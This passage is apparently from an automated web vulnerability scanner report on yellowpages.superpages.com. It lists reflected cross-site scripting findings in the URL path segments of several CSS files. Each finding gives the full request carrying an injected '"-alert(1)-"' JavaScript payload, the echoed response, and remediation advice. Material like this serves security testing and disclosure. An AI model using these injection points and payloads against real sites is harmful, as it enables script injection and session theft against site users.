HTTP/1.1 404 /commonad15d&quot;-alert(1)-&quot;4cb99c62a1b/css/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=98569611A90DDF545C63EF46782C91CF; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:16 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonad15d"-alert(1)-"4cb99c62a1b/css/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.574. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c75f4"-alert(1)-"02b021d68ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc75f4&quot;-alert(1)-&quot;02b021d68ca/sendtom.css
Server: Unspecified
Set-Cookie: JSESSIONID=961E21ED8472E86EF4F8EBD9ECEB24D4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:24 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc75f4"-alert(1)-"02b021d68ca/sendtom.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.575. http://yellowpages.superpages.com/common/css/sendtom.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sendtom.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec1e7"-alert(1)-"03bc909001e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sendtom.cssec1e7&quot;-alert(1)-&quot;03bc909001e
Server: Unspecified
Set-Cookie: JSESSIONID=89100A70CAE7838057FA2B0BF2BD7136; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:30 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sendtom.cssec1e7"-alert(1)-"03bc909001e?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.576. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c20"-alert(1)-"e4243f6ac8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond0c20&quot;-alert(1)-&quot;e4243f6ac8f/css/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=AC90724B3D6058EB845DA1C9B8F4C038; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:43 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond0c20"-alert(1)-"e4243f6ac8f/css/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.577. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8cb3"-alert(1)-"ad160d53bf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/csse8cb3&quot;-alert(1)-&quot;ad160d53bf0/spcore.css
Server: Unspecified
Set-Cookie: JSESSIONID=A653C00D1D509E4F913800C0855B5E3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:53 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/csse8cb3"-alert(1)-"ad160d53bf0/spcore.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.578. http://yellowpages.superpages.com/common/css/spcore.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spcore.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fc04"-alert(1)-"230ea56f1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spcore.css4fc04&quot;-alert(1)-&quot;230ea56f1b4
Server: Unspecified
Set-Cookie: JSESSIONID=F118099836FFFF9E6242ECE63F34CE56; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:00 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spcore.css4fc04"-alert(1)-"230ea56f1b4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.579. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97191"-alert(1)-"a26cfc23980 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common97191&quot;-alert(1)-&quot;a26cfc23980/css/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=EA759A48641FB029323258B469F2D696; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:59 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6e3da&quot;-alert(1)-&quot;acb1d78ef25/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=D52748B2F7AE3B38F917957D6A181889; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spflyouts.1.0.cssfa201&quot;-alert(1)-&quot;737b17cce6d
Server: Unspecified
Set-Cookie: JSESSIONID=69DC6403BFC862BADBDF43AFF539343B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:14 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common53209&quot;-alert(1)-&quot;19f62aec85/css/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=8E8F60E769287FC4C64A66BDCBA5CF11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common53209"-alert(1)-"19f62aec85/css/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc53f7&quot;-alert(1)-&quot;f0b92738dcd/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=85975BEBF5BE4BEC0876302A028AEC4B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sppromoads.cssc6905&quot;-alert(1)-&quot;628f1c95393
Server: Unspecified
Set-Cookie: JSESSIONID=D69C3C5699393247BF29AC6893B9AA7D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4770c&quot;-alert(1)-&quot;4414bf7cc3/css/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=B3A85C1803D19FCD2490D1349686EC11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:26 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4770c"-alert(1)-"4414bf7cc3/css/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdee76&quot;-alert(1)-&quot;0d4decbeb19/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=ABCC92F3BBD93E038D6DE273AA54967F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:33 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdee76"-alert(1)-"0d4decbeb19/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/structure.cssb1738&quot;-alert(1)-&quot;099ed66255a
Server: Unspecified
Set-Cookie: JSESSIONID=E9374EE61141A9229E321BCE1DD67FDA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:41 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


